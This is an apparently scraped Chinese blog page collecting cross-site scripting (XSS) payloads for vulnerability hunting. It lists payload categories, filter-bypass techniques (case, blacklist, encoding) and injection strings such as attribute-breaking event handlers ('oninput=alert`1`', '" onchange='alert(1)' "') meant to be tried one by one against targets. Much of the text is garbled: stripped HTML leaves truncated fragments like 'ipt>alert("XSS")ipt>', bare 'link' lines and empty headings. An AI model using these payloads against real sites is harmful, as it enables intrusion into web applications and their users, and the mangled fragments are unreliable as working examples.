XSS漏洞挖掘命令集合

1.5      XSS Payload

第一类:Javascript URL

link

link

link

Hello

Hello

第二类:CSS import

第三类:Inline style

第四类:JavaScript 事件

第五类:Script 标签

ipt>alert("XSS")ipt>

一个一个试,推理一下

DOM型,存储型,反射性,大小写绕过,黑名单绕过,编码绕过,onclick事件绕过

关键词:闭合字符,alert,script,<>,',",(),URL编码,ASCII/10进制转换

alert(/xss/)

";alert(/xss/)//

"><"

"> //

ipt>alert("ANY")ipt>

"> alert`xss` //

oninput=alert`1`

test

""

" onchange='alert(1)' "

oninput=alert`1`

"> click me //

你可能感兴趣的:(XSS漏洞挖掘命令集合)